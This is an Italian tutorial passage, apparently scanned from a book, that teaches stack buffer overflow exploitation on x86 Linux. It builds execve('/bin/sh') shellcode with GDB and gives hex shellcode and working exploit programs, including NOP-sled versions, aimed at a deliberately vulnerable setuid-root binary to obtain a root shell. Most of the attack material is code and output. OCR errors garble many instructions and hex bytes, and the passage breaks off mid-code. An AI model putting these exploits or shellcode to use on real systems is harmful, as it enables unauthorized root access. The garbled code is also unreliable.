Ora se volessimo fare in modo che l'indirizzo di ritorno salti l'assegnazione x = 1 dovremo 
disassemblare con il disassemblatore relativo all'ambiente dove state facendo le prove. 
Usando GDB avremo : 



function main: 






0x8000490 


<main> : pushl %ebp 


0x8000491 


<main+l> : 


movi %esp, %ebp 


0x8000493 


<main+3> : 


subì $0x4, %esp 


0x8000496 


<main+6> : 


movi $0x0, Oxfffffffc (%ebp) 


0x800049d 


<main+13> 


pushl 


$0x3 


0x800049f 


<main+15> 


pushl 


$0x2 


0x80004al 


<main+l 7> 


pushl 


$0x1 


0x80004a3 


<main+19> 


cali 


0x8000470 <function> 


0x80004a8 


<main+24> 


addi 


$Oxc, %esp 


0x80004ab 


<main+27> 


movi 


$0x1, Oxfffffffc (%ebp) 


0x80004b2 


<main+34> 


movi 


Oxfffffffc (%sbp) , %eax 


0x80004b5 


<main+37> 


pushl 


%eax 


0x80004b6 


<main+38> 


pushl 


$0x80004f8 


0x80004bb 


<main+43> 


cali 


0x8000378 <printf> 


0x80004c0 


<main+48> 


addi 


$0x8, %esp 


0x80004c3 


<main+51> 


movi 


%ebp, %esp 


0x80004c5 


<main+53> 


popi 


%ebp 


0x80004c6 


<main+54> 


ret 





Nel caso del disassemblato sotto Linux il valore di ritorno originale è 0x8004a8 mentre quello 
che vogliamo settare e 0x8004b2. 

Il settaggio di questo valore è dovuto al fatto che vogliamo saltare l'esecuzione 
dell'assegnazione e quindi saltare 8 bytes dopo quello che sarebbe stato il valore normale. 



ret = bufferl + 12; 



Le due istruzioni precedenti sono quelle che vanno a cambiare l'indirizzo di ritorno. 
Quello che è stato fatto fino ad ora aveva come scopo quello di dimostrare come è possibile 
modificare il flusso di un programma mediante un operazione di soprascrittura di un valore 
dentro allo stack. 

Un esempio che mostra come è possibile cambiare un valore di ritorno di ujna funzione 
all'interno dello stack è quello che segue. 

^include <stdio .h> 

void funz±one2 (void) 
{ 

printf ( " \nQuesta funzione non la chiama nessuno 
direttamente ! ") ; 
exit (0) ; 

ì 

void funzionel (int b) 
{ 

printf ("\nAddr b=%04x", (unsigned int) Sb) ; 
(* ( (unsigned int *) ((unsigned int) &b) +2) ) = (unsigned int) 
&funzione2; 
) 
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void main () 
{ 

funzlonel (0) ; 



Come potete vedere la funzione2() non la chiama nessuno eppure questa viene eseguita in 
quanto la variabile b all'interno della prima funzione viene utilizzata come riferimento per 
andare a sostituire l'indirizzo di ritorno. 

Ora vediamo di modificare la funzione in modo tale che il metodo di fatto sia simile a quello 
che generalmente viene utilizzato. 

Supponiamo che il buffer b che deve ricevere un valore sia di 10 caratteri. 
Qundi sarebbe cosa normale copiare dentro al buffer una stringa del tipo 

b[0123456789] [addr] 
abcdefghi\0 

Ora supponiamo di volerci inserire alla fine dei 1 0 caratteri l'indirizzo della funzione2(). 
Questo sconfinerebbe nello stack dentro a quello spazio in cui è memorizzato l'indirizzo di 
ritorno. 




dove 1234 specifica l'indirizzo della funzione2(). 

Nella variabile buffer mettiamo i caratteri accettati e alla fine ci mettiamo l'indirizzo di 
funzione2 e successivamente copiamo dentro alla variabile b[] il buffer. 

#include <stdio ,h> 

char buffer [24] ; 

void funzione2 (void) 
{ 

printf ( " \nQuesta funzione non la chiama nessuno direttamente") ; 
exit (0) ; 

} 

void funzionel (void) 
{ 

char b[10] ; 

sprint f (buffer, "abcdefghi%d" , (unsigned int) Sfunzione2) ; 
printf (" \nll buffer contiene : %s" , buffer); 
strcpy (b, buffer); // Ora copiamo sconfinando 

} 



void main ( ) 
{ 

funzionel () ; 



Chiaramente in questo caso l'assegnazione del valore avviene mediante operazione diretta 
ma se ci fosse stata la possibilità di avere un riferimento di memoria ci si sarebbe potuto 
riempire con dei NULL o altri valori fino al punto in cui poi di fatto sarebbe proseguito il 
programma. 

NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET 



FATE ATTENZIONE : Il metodo di inserire dei NOP è essenziale in quanto come vedremo, 
identificare l'indirizzo di dove fare eseguire il tutto è complesso. 
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L'uso dei NOP server a semplificare il tutto. 

Le tecniche di buffer overflow in ogni caso non cambiano solo il flusso ma aggiungono anche 
del codice espresso come codici operativi esadecimali. 

Sempre al fine di semplificare l'esempio rimaniamo sempre in ambiente Linux dove per 
attivare una shell da un programma in linguaggio c è sufficiente chiamare un istruzione 
execve() passandogli come argomento la stringa /bin/sh. 

In altre parole un programma in linguaggio C adatto ad aprire una shell potrebbe essere il 
seguente: 



^include <stdio.h> 



void main () { 

char *name [2] ; 
name[0] = "/bin/sh"; 
name [1] = NULL; 
execvs (name[0 ] , name, NULL) ; 



Vi consiglio in ogni caso di andare a vedere : 
http://www.hack.co.za/shellcode/linux-x86/execve_binsh.c 
Un esempio in assembler molto corto è : 



mov ecx, esp 
xor eax, eax 
push eax 
lea ebx, [esp-7] 
add esp, 12 
push eax 
push ebx 
mov edx, ecx 
mov al, 11 
int 0x80 



Vedre.mo successivamente che spesso a causa delle microscopiche dimensioni dei buffer 
più piccolo è il programma di shell meglio è. 

In ogni caso uno shell code visto in esadecimale potrebbe essere quello che segue: 
char lunixshell[] = 

"\xeb\xld\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x$ 
" \xOb \x8 7 \xf3 \x8d\x4b \x08 \x8d\x53 \xOc \xcd\x80 \x29 \xcO \x40\x$ 
" \x80 \xe8 \xde \xff\xff\xff /bin/sh "; 

Compilando il codice precedente e guardando I codici operativi relativi alla parte da inserire in 
memoria avremmo la seguente visione dello stack considerando anche il fatto di assumere 
che questo parta da OxFF e che la lettera S rappresenti appunto il codice: 



bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of 

memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory 

buffer sfp ret a b c 

< [SSSSSSSSSSSSSSSSSSSS] [SSSS] [0xD8] [0x01 ] [0x02] [0x03] 

I 

I / 




La compilazione del programmino deve essere eseguita mediante il flag -static in modo da 
poter usare il debugger gdb per poter vedere il codice disassemblato. 
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Il programma utilizza la funzione di libreria execve e dato che stiamo usando delle librerie 
dinamiche questa non viene piazzata direttamente all'interno del nostro programma. 
La compilazione mediante la specifica -static è quello che fa per noi. 
Disassemblando con gdb ritroviamo il seguente programma in assembler : 



0x8000130 <main>: pushl %ebp 

0x8000131 <ma±n+l>: movi %esp, %ebp 

0x8000133 <main+3>: 

0x8000136 <main+6>: 

0x800013d <ma±n+13> 

0x8000144 <main+20> 

0x8000146 <main+22> 

0x8000149 <main+25> 

0x800014a <main+26> 

0x800014d <ma±n+29> 

0x800014e <maln+30> 

0x8000153 <ma±n+35> 

0x8000156 <main+38> 

0x8000158 <main+40> 

0x8000159 <ma±n+41> 

(gdb) disassemble 

Dump of assembler code for function 



subì $0x8, %esp 

movi $0x80027b8,0xfffffff8(%ebp) 
movi $0x0, Oxfffffffc(%ebp) 
pushl $0x0 

leal 0xfffffff8 (%ebp) , %eax 
pushl %eax 

movi 0xfffffff8 (%ebp) , %eax 
pushl %eax 

cali 0x80002bc < execve> 

addi $Oxc, %esp 
movi %ebp, %esp 
popi %ebp 
ret 
_execve 



0x80002bc 
0x80002bd 
0x80002bf 
0x80002c0 
0x80002c5 
0x80002c8 
0x80002cb 
0x80002ce 
0x80002d0 
0x80002d2 
0x80002d4 
0x80002d6 
0x80002d8 
0x80002d9 
0x80002de 
0x80002df 
0x80002el 
0x80002e6 
0x80002e7 
0x80002e9 
0x80002ea 
0x80002eb 



execve : 

_execve>: pushl %ebp 

_execve+l>: movi %esp, %ebp 

_execve+3>: pushl %ebx 

_execve+4>: movi $Oxb, %eax 

0x8 (%ebp) , %ebx 

movi Oxc ( %ebp) , %ecx 

movi 0x10 (%ebp) , %edx 

int $0x80 

movi %eax, %edx 

testi %edx, %edx 

jnl 0x80002e6 < execve+42> 

negl %edx 

pushl %edx 

cali 0x8001a34 < normal_errno_location> 

popi %edx 

movi %edx, (%eax) 

movi $Oxffffffff, %eax 

popi %ebx 

movi %ebp, %esp 

popi %ebp 
ret 
nop 



_execve+9> : movi 
_execve+12> 
_execve+15> 
_execve+18> 
_execve+20> 
_execve+22> 
_execve+24> 
_execve+26> 
_execve+28> 
_execve+29> 
_execve+34> 
_execve+35> 
_execve+3 7> 
_execve+42> 
_execve+43> 
_execve+45> 
_execve+46> 
_execve+47> 



End of assembler dump. 



La parte costituita da 

0x8000130 <main>: pushl %ebp 
0x8000131 <main+1>: movi %esp,%ebp 
0x8000133 <main+3>: subì $0x8,%esp 

è quella che abbiamo definito precedentemente con il termine di PROCEDURE PRELUDE il 
quale riserva lo spazio per le variabili locali, in questo caso 

char *name[2] 
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I puntatori sono di lunghezza pari a una WORD per cui le dimensioni delle due WORD sono 8 
BYTES. 

0x8000136 <main + 6>: movi $0x80027b8,0xfffffff8(%ebp) 

L'istruzione precedente invece copia l'indirizzo della stringa /bin/sh nel primo puntatore. 
L'istruzione è l'equivalente di : 



0x80001 3d<main + 13>: movi $0x0,0xfffffffc(%ebp) 

A questo punto copiano il valore 0x0 (NULL) dentro al secondo puntatore di name[] il che 
sarebbe uguale a : 

name[1] = NULL; 

La chiamata a execve() inizia qui. 



A questo punto iniziamo ad eseguire il push degli argomenti nello stack in ordine inverso. 
Partiamo con il NULL. 



Ora leggiamo l'indirizzo di name[] dentro al registro EAX. 
0x8000149 <main+25>: pushl %eax 
Eseguiamo il push dellindirizzo di name[] nello stack. 
0x80001 4a <main+26>: movi 0xfffffff8(%ebp),%eax 
Leggiamo l'indirizzo della stringa "/bin/sh" nel registro EAX. 



Ora inseriamo nello stack l'indirizzo della stringa "/bin/sh".. 

0x80001 4e <main+30>: cali 0x80002bc < execve> 

Chiamiamo la funzione execve(). 

Ricordiamoci che la chiamata ad una funzione fa si che il sistema memorizzi nello stack il 
valore di IP. 

Ricordiamoci che siamo in un ambiente Linux su piattaforma Intel per cui i dettagli della 

syscall varia da OS a OS, e da CPU a CPU. 

Alcune passano gli argomenti nello stack mentre altri nel registro. 

Lo stack inizia per ogni programma allo stesso indirizzo. 

Aluni usano un interrupt software per saltare nella modalità kernel mentre altri usano una cali 
far. 

Linux passa I suoi argomenti alla chiamata di sistema attraverso il registro ed utilizza un 
interrupt software per saltare nella modalità kernel. 

Il discorso l'abbiamo fatto nei capitoli in cui parlavamo della programmazione in questo 
ambiente a cui vi rimando per chiarirvi le idee rispetto alle syscall. 
All'interno di 

/usr/include/asm/unistd.h 
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esiste la lista delle syscall anche se di fatto a noi interessa solo comprendere che in questo 
caso la execve chiama la syscall e successivamente l' int 0x80. 
Tra poche linee vedremo che il numero della syscall uguale a 

#define NR_execve 11 

verrà passato tramite il registro %eax 

0x80002bc < execve>: pushl %ebp 




Il preludio dela procedura : 



Copiamo Oxb (1 1 decimale) nello stack. 

Questo è l'indice all'interno della tabella delle syscall o chiamate di sistema di cui appunto la 
execve è la numero 1 1 . 

0x80002c5 <_execve+9>: movi 0x8(%ebp),%ebx 
Copiamo l'indirizzo di 7bin/sh" in EBX. 



Copiamo l'ndirizzo di name[] in ECX. 
0x80002cb<_execve+15>: movi 0x10(%ebp),%ed 
Copiamo l'indirizzo del nuli pointer in %edx. 
0x80002ce < execve+18>: int $0x80 



A questo punto ci troviamo di fronte ad un grosso problema. 

Partiamo dal presupposto che noi questi buffer overflow quasi sicuramente li dovremo inserire 
da qualche parte dove il programma che intendiamo colpire gestisce l'input tramite qualche 
stringa del Linguaggio C. 

Il carattere '\0' o 0 viene considerato dal linguaggio come carattere di fine stringa per cui 

all'interno della stringa che passeremo al software non dovranno esserci degli 0 se no il resto 

del buffer non verrà processato. 

Ma dopo questa parentesi cosa ci troviamo davanti ? 

Diamo un attimo un occhiata agli OPCODE dell'istruzione movi $0xb,%eax. 



potremmo risolvere il problema usando la seguente metodologia : 




Cosa abbiamo fatto ? 

Semplicemente abbiamo ripulito EAX e assegnato solo la parte bassa. 

Ora cambiamo la modalità del kernel mediante la chiamata a int 0x80. 

La funzione execve chiama int 0x80 utilizzando i registri per il passaggio degli argomenti 

usando il metodo classico degli interrupts. 

Tutto quello che dobbiamo fare è questo : 

Avere la stringa terminata con un nulli "/bin/sh" da qualche parte in 
memoria 
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Avere 1' indirizzo della stringa "/bin/sh" da qualche parte in memoria 
seguita da una word contenente un nuli . 
Copiare Oxb nel registro EAX . 

Copiare 1' indirizzo della sringa "/bin/sh" nel registro EBX. 
Copiare 1' indirizzo della sringa "/bin/sh" in ECX. 

1' indirizzo della long word con nuli in EDX. 



Ma cosa capita se la chiamata a execve() fallisce per qualche ragione? 

Il programma continua andando a prendere le istruzioni dallo stack, il quale potrebbe 

contenere dei dati random. 

Il programma probabilmente eseguirà un core dump. 

Noi però vorremmo che il programma esca in modo pulito se la chiamata a execve falisse.. 
Per fare questo dovremo aggiungere una syscall exit dopo a chiamata di sistema execve 
Che cosa farebbe una exit in questo caso ? 



exit . c 



^include <stdlib.h> 

void main () { 

exit (0) ; 

} 



[alephl]$ gcc -o exit -static exit.c 
[alephl]$ gdb exit 



GDB is free software and you are welcome to distribute copies of it 
under certain conditions ; type "show copying" to see the conditions . 
There is absolutely no warranty for GDB; type "show warranty" for details . 
GDB 4.15 (i586-unknown-linux) , Copyright 1995 Free Software Foundation, 
Inc. . . 

(no debugging symbols found) . . . 
(gdb) disassemble _exit 

Dump of assembler code for function _exit : 



0x800034c 


<_exit>: 


pushl 


%ebp 


0x800034d 


<_exit+l> : 


movi 


%esp, %ebp 


0x800034f 


<_exit+3> : 


pushl 


%ebx 


0x8000350 


<_exit+4> : 


movi 


$0x1, %eax 


0x8000355 


<_exit+9> : 


movi 


0x8 (%ebp) , %ebx 


0x8000358 


<_exit+12> : 


int 


$0x80 


0x800035a 


<_exit+14> : 


movi 


Oxfffffffc (%ebp) , %ebx 


0x800035d 


<_exit+17> : 


movi 


%ebp, %esp 


0x800035f 


<_exit+19> : 


popi 


%ebp 


0x8000360 


<_exit+20>: 


ret 




0x8000361 


<_exit+21> : 


nop 




0x8000362 


<_exit+22> : 


nop 




0x8000363 


<_exit+23> : 


nop 




End of assembler dump. 







La chiamata di sistema exit mette 0x1 in EAX, mette il codice d'uscita EBX, ed esegue una 
chiamata a "int 0x80". 

Molte applicazioni ritornano 0 in uscita per dire che non ci sono stati errori. 
Mettiamo 0 in EBX. 

La nosra lista di operazioni da eseguire sono ora : 

Avere una stringa terminata con NULL "/bin/sh" da qualche parte in 
memoria . 

Avere 1' indirizzo della stringa "/bin/sh" da qualche parte in memoria 
seguito da una long word con nuli. 
Copiare Oxb in EAX. 

Copiar el' indirizzo della stringa "/bin/sh" nel registro EBX. 
Copiare 1' indir izzodella stringa "/bin/sh" in ECX. 
Copiare 1' indirizzo dela long word con nuli in EDX. 
Eseguirei' itrsuzione int $0x80. 
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Copiare Oxl in EAX. 




Per fare questo in linguaggio assembler, piazzando la stringa dopo il codice, e ricordandosi 
dove è stato messo l'indirizzo, e una nuli word dopo l'array, avremmo: 



movi string_addr, string_addr_addr 

movb $0x0, null_byte_addr 

movi $0x0, null_addr 

movi $Oxb, %eax 

movi string_addr, %ebx 

leal string_addr, %ecx 

leal null_string, %edx 

int $0x80 

movi $0x1 , %eax 

movi $0x0, %ebx 

int $0x80 



Il problema relativo alla scrittura di questo esempio di buffer overflow è che non possiamo 
conoscere dove verrà inserita all'interno della memoria, del programma che intendiamo 
explottare, la stringa relativa alla chiamata della shell . 

Un metodo per superare il problema è quello di usare un JMP o una CALL le queli 
possiedono come vantaggio quello di accettare anche indirizzi relativi specificati ad esempio 
mediante l'instruction pointer register (IP). 

Se piazzassimo la cali immediatamente prima della stringa 7bin/sh" in modo tale che 
l'indirizzo di questa venga salvata nello stack come valore di ritorno, e un JMP a questa 
istruzione, l'indirizzo della stringa verrebbe pushata nello stack come indirizzo di ritorno 
qaqndo la cali viene eseguita. 

Tutto quello di cui abbiamo bisogno è di copiare l'indirizzo di ritorno dentro a un registro. 
L'istruzione CALL può semplicemente chiamare l'inizio del nostro codice seguente. 
Assumiamo ora che J stia per l'istruzione di JMP, C per l'istruzione CALL, ed infine s per la 
stringa: 



base della 


DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF 


cima della 


memoria 


89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF 


memoria 




buffer 


fp ret a b c 




< 


[JJSSSSSSSSSSSSSSCCss] [ssss] [0xD8] [0x01 ] [0x02] [0x03] 






A 1 A 


A / / 






III 


// l(D 




(2) 


II 


II 






1 


1 (3) 




cima dello 






base 



Il tutto visto in assembler 



jmp 


offset-to-call # 2 bytes 




popi 


%esi # 1 byte < \ 




movi 


%esi, array-offset (%esi) # 3 bytes \ 




movb 


$0x0, nullbyteoffset (%esi) # 4 bytes / 




movi 


$OxO,null-offset(%esi) # 7 bytes \ (2) 




movi 


$Oxb, %eax # 5 bytes \ 




movi 


%esi, %ebx # 2 bytes / 


1 (1) 


leal 


array-offset, (%esi) , %ecx # 3 bytes \ 




leal 


null-offset (%esi) , %edx # 3 bytes / 




int 


$0x80 # 2 bytes \ 




movi 


$0x1, %eax # 5 bytes \ 
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Calcolando tutti gli offset in base alla lunghezza delle istruzioni, abbiamo: 



jmp 


0x26 


# 


2 bytes 


popi 


%esi 


# 


1 byte 


movi 


%esi, 0x8 (%esi) 


# 


3 bytes 


movb 


$0x0, 0x7 (%esi) 


# 


4 bytes 


movi 


$0x0, Oxc(%esi) 


# 


7 bytes 


movi 


$Oxb, %eax 


# 


5 bytes 


movi 


%esi, %ebx 


# 


2 bytes 


leal 


0x8 (%esi) , %ecx 


# 


3 bytes 


leal 


Oxc (%esi) , %edx 


# 


3 bytes 


int 


$0x80 


# 


2 bytes 


movi 


$0x1, %eax 


# 


5 bytes 


movi 


$0x0, %ebx 


# 


5 bytes 


int 


$0x80 


# 


2 bytes 


cali 


-0x2b 


# 


5 bytes 






8 bytes 



Il nostro codice modifica se stesso, ma la regione TEXT (in cui si trova il codice) e' marcata 
READ-ONLYda quasi tutti i sistemi operativi. 

Per risolvere il problema possiamo inserire tutte le istruzioni all'interno di un array che viene 
posizionato nel segmento DATA. 

Come nell'esempio in cui avevo mostrato l'esecuzione del codice inserito dentro ad un array 
d'interi, all'inizio di questo capitolo, anche in questo caso avremo la necessità di trovare gli 
OPCODE per eseguire l'assegnazione dell'array. 

Prima scriviamoli in assembler dentro ad un programma in C e poi usiamo GDB per vederli : 

shellcodeasm. c 

sn ±p 

void main () { 
asm (" 



jmp 


0x2 a 


# 


3 bytes 


popi 


%esi 


# 


1 byte 


movi 


%esi, 0x8 (%esi) 


# 


3 bytes 


movb 


$0x0, 0x7 (%esi) 


# 


4 bytes 


movi 


$0x0, Oxc(%esi) 


# 


7 bytes 


movi 


$Oxb, %eax 


# 


5 bytes 


movi 


%esi, %ebx 


# 


2 bytes 


leal 


0x8 (%esi) , %ecx 


# 


3 bytes 


leal 


Oxc (%esi) , %edx 


# 


3 bytes 


int 


$0x80 


# 


2 bytes 


movi 


$0x1, %eax 


# 


5 bytes 


movi 


$0x0, %ebx 


# 


5 bytes 


int 


$0x80 


# 


2 bytes 


cali 


-0x2f 


# 


5 bytes 


.string \"/bin/sh\" 


# 


8 bytes 



"); 
ì 



Ed ecco il debugging: 

$ gcc -o shellcodeasm -g -ggdb shellcodeasm. c 
$ gdb shellcodeasm 

GDB is free software and you are welcome to distribuite copies of it 
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There is absolutely no warranty for GDB; type "show warranty" for 
details . 

GDB 4.15 (1586-unknown-linux) , Copyright 1995 Free Software 
Foundation, Inc. . . 
(gdb) disassemble main 

Dump of assembler code for function main: 



0x8000130 


<main> : 


pushl 


%ebp 


0x8000131 


<main+l> : 


movi 


%esp, %ebp 


0x8000133 


<main+3> : 


jmp 


0x800 015 f <main+47> 


0x8000135 


<main+5> : 


popi 


%esi 


0x8000136 


<main+6> : 


movi 


%esi, 0x8 (%esi) 


0x8000139 


<main+9> : 


movb 


$0x0, 0x7 (%esi) 


0x800013d 


<main+13> : 


movi 


$0x0, Oxc (%esi) 


0x8000144 


<main+20> : 


movi 


$Oxb, %eax 


0x8000149 


<main+25> : 


movi 


%esi, %ebx 


0x800014b 


<main+27> : 


leal 


0x8 (%esi) , %ecx 


0x800014e 


<main+30> : 


leal 


Oxc (%esi) , %edx 


0x8000151 


<main+33> : 


int 


$0x80 


0x8000153 


<main+35> : 


movi 


$0x1, %eax 


0x8000158 


<main+40> : 


movi 


$0x0, %ebx 


0x800015d 


<main+45> : 


int 


$0x80 


0x800015f 


<main+47> : 


cali 


0x8000135 <main+5> 


0x8000164 


<main+52> : 


das 




0x8000165 


<main+53> : 


boundl 


0x6e (%ecx) , %ebp 


0x8000168 


<main+56> : 


das 




0x8000169 


<main+57> : 


jae 


0x80001d3 < new_exitfn+55> 


0x800016b 


<main+59> : 


addb 


%cl, 0x55c35dec (%ecx) 



End of assembler dump. 

(gdb) x/bx main+3 - mostra il valore esadecimale del byte che 

forniamo come argomento 
0x8000133 <main+3>: Oxeb 

(gdb) 




La procedura deve essere ripetuta per tutto il codice. 

testsc. c 

char shellcode [] = 

"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" 
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" 
" \xb8 \x01 \xOO\xOO\xOO \xbb\xOO \xOO\xOO\xOO \xcd\x80 \xe8 \xdl \xff\xff" 
" \xff\x2f\x62 \x69\x6e \x2f\x73 \x68\x00 \x89\xec\x5d\xc3 "; 

void main () { 

int *return; 

return = (int *) Sreturn + 2; 
/* in effetti aggiunge 8 byte = 2 integers */ 

/* ricordatevi sempre la struttura dello stack, e che un int e' composto di 4 byte. 
Questa istruzione in effetti fa puntare return ali 'indirizzo di RET in memoria (che si 
trova 8 byte dall'inizio della variabile puntatore *return...lo so che e' un 
asino. . .beccatevi sto diagrammino (ogni spazio equivale a 1 byte) : 

return fp RET 
l 11 il ] 

A A 

/ — 8 byte / 

*/ 

(*return) = (int) shellcode; 
/* fa puntare RET al nostro shellcode, eseguendolo a tutti gli effetti */ 
} 
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$ gcc -o testsc testsc.c 
$ ./testsc 
$ exit 
$ 

A questo punto sostituiamo le istruzioni che corrispondono a 0, per il problema di cui abbiamo 
discusso prima, con altre che non costituiscano un problema: 



Istruzione da cambiare: Sostituire con: 



movb 


$0x0, 0x7(%esi) 


xorl 


%eax, %eax 


molv 


$0x0, Oxc(%esi) 


movb 


%eax, 0x7 (%esi) 






movi 


%eax, Oxc (%esi) 


movi 


$0xb, %eax 


movb 


$0xb, %al 


movi 


$0x1 , %eax 


xorl 


%ebx, %ebx 


movi 


$0x0, %ebx 


movi 


%ebx, %eax 











A questo punto il codice è diventato: 
char shellcode[] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 
" \x89 \xf3 \x8d\x4e \x08 \x8d\x56\x0c \xcd\x80 \x31 \xdb \x89 \xd8 \x40\xcd 



Il sistema di buffer overflow permette di creare una shell con diritti di root in quanto applicati a 
dei programmi che vengono eseguiti con diritti di root. 



Il flag S all'interno dei flags delle permissions indica che il file può essere eseguito da 
chiuqnue ma con diritti dei proprietari dei files, in questo caso root. 

Questo e' a volte necessario ad alcuni programmi per aggiornare file di sistema scrivibili solo 

da root o per accedere, ad esempio, alla mailbox dell'utente. 

Per questo quando exploitiamo un file suid root, la shell che esso esegue e' di root. 

A questo punto creiamo appositamente un programma vulnerabile ad un overflow e vediamo 

di riuscire a creare un exploit. 

Chiaramente un programma creato apposta per essere explotato facilita la vita cosa che con 
un altro software in cui non sappiamo dove va a finire il codice la questione è sicuramente più 
complessa. 

exploitl . c 

sn ±p 

char shellcode[] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80 \xe8 \xdc \xff\xff\xff/bin/sh "; 

char large_string[128] ; 

void main () { 

char buffer [96]; /* il buffer */ 

int i; 

long *long_ptr = (long *) large_string; 

for (i = 0; i < 32; i++) 

* (long_ptr + i) = (int) buffer; 

/* riempiamo completamente il nostro buffer (large_string) con 1 'indirizzo 
di buffer */ 

for (i = 0; i < strlen(shellcode); i++) 
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large_str±ng[±] = shellcode [i] ; 
/* posizioniamo lo shellcode ali 'inizio del nostro buffer */ 
strcpy (buffer, large_string) ; 

/* il RET viene sovrascritto con 1 'indirizzo di buffer, che contiene il 
nostro shellcode , che viene eseguito */ 



$ gcc -o exploitl exploitl . c 
$ ./exploitl 




Le cose nella realtà sono più complesse in quanto con un altro programma non sappiamo 
dove il buffer si trova in memoria. 

Il fatto d'indovinare dove si trova il buffer può essere facilitato da alcuni metodi comunque in 
ogni caso va sempre a fortuna a meno che non facciamo come abbiamo visto nei capitoli in 
cui parlavamo dei programmi usati dai crackers e disassembliamo i programmi a casa nostra. 
Come abbiamo detto prima sappiamo che tutti i programmi possiedono lo stack che inizia 
sempre allo stesso indirizzo. 

Ora scriviamo un piccolo programmino vulnerabile, rendiamolo suid root, e tentiamo di 
exploitarlo: 

vulnerable . c 

sn ±p 

void main(int argc, char *argv[]) { 
char buffer [512] ; 

if (argc > 1) 

strcpy (buffer, argv[l] ) ; /* guarda dove scrivi, cazzone! :) */ 

ì 



exploit2 . c 

sn ±p 

^include <stdlib.h> 

tidefine DEFAULT_OFFSET 0 
tidefine DEFAULT_BUFFER_SIZE 512 

char shellcode [] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd 
"\x80 \xe8 \xdc \xff\xff\xff/bin/sh "; 

unsigned long get_sp (void) { 
asm ( "movi %esp, %eax ") ; 

} 

void main(int argc, char *argv[]) { 
char *buff, *ptr; 
long *addr_ptr, addr; 

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 
int i; 

if (argc > 1) bsize = atoi (argv [1] ) ; 
if (argc > 2) offset = atoi (argv [2] ) ; 

if (! (buff = malloc (bsize) ) ) { 

printf ("Can't allocate memory. \n") ; 
exit (0) ; 

} 
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addr = get_sp() - offset; /* l'indirizzo a cui si SUPPONE che il nostro 

codice si troverà ' */ 

printf ("Using address: Ox%x\n", addr); 

ptr = buff; 

addr__ptr = (long *) ptr; /* riempie il nostro buffer con quell 'indirizzo 

*/ 

for (i = 0; i < bsize; i+=4) 
* (addr_ptr++) = addr; 

ptr += 4; 

for (i = 0; i < strlen (shellcode) ; i++) 

* (ptr++) = shellcode [i] ; /* copia lo shellcode nel nostro buffer */ 

buff [bsize - 1] = '\0' ; /* per bloccare la copia da parte di strcpy */ 

memcpy (buff ', "EGG=" , 4) ; /* mette il tutto in una variabile d'ambiente $EGG 
*/ 

putenv(buff) ; /* che useremo poi come argomento al programma 

*/ 

system (" /bin/bash" ) ; /* vulnerabile */ 

} 



Il programma accetta come argomento l'offset a cui pensiamo si possa trovare il buffer. 
Mediante diversi tentivi vediamo di trovare dove si trova. 

$ . /exploit! 500 

Using address: 0xbffffdb4 

$ ./vulnerable $EGG 

Segmentation Fault 

$ ./exploit2 600 

Using address: 0xbffffdb4 

$ ./vulnerable $EGG 

Illegal instruction 



$ ./exploit2 600 1564 
Using address: 0xbffff794 
$ ./vulnerable $EGG 
% 

Questo non e' un processo molto efficiente. ...sculando un po' si potrebbe azzeccare l'offset 

con 200 tentativi, ma nella maggior parte dei casi ce ne vorranno un migliaio. 

Possiamo però cercare di limitare i tentivi utilizzando l'istruzione assembler NOP. 

Come abbiamo già visto nei capitoli legati all'assembler questa istruzione è considerata come 

istruzione NULLA ovvero quando il processore la incontra passa a quella successiva sennza 

fare nulla. 

Ora se noi riempiamo il nostro buffer di questi NOP significa che se l'indirizzo di ritorno cadrà 
su una di queste istruzioni questa non verrà eseguita e il tutto passerà avanti. 



buffer 


fP 


ret a 


b 


c 


[NNNNNNNNNNNSSSSSSSSS ] 


[OxDE] 


[OxDE] [OxDE] [OxDE] [OxDE] 


A > 

/ 




1 
1 







Ecco un nuovo exploit che utilizza questa tecnica: 



exploit3 . c 




sn ±p 




^include <stdlib.h> 




#define DEFAULT OFFSET 


0 
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#define DEFAUL T_B UFFER_ SIZE 512 
#define NOP 0x90 

char shellcode[] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 
" \x89 \xf3 \x8d\x4e \x08 \x8d\x56\x0c \xcd\x80 \x31 \xdb \x89 \xd8 \x40\xcd 
" \x80 \xe8 \xdc \xff\xff\xff/bin/sh "; 

unsigned long get_sp (void) { 
asm ( "movi %esp, %eax") ; 

ì 

old maln (Int argc, char *argv[]) { 
char *buff, *ptr; 
long *addr _ptr, addr; 

int offset=DEFAULT_OFFSET, bsize =DEFA UL T_B UFFER_ SIZE ; 
int i; 

if (argc > 1) bsize = atoi (argv[l] ) ; 
if (argc > 2) offset = atoi (argv[2] ) ; 

if (! (buff = malloc (bsize) ) ) { 

printf ("Can't allocate memory. \n") ; 
exit (0) ; 

; 

addr = get_sp() - offset; 

printf ("Using address: 0x%x\n", addr) ; 

ptr = buff; 

addr_ptr = (long *) ptr; 
for (i = 0; i < bsize; i+=4) 
*(addr _ptr++) = addr; 

for (i = 0; i < bsize/2; i++) /* riempie meta ' del nostro buffer 
con NOP */ 

buff[i] = NOP; 

ptr = buff + ((bsize/2) - (strlen (shellcode) /2) ) ; 
for (i = 0; i < strlen (shellcode) ; i++) 

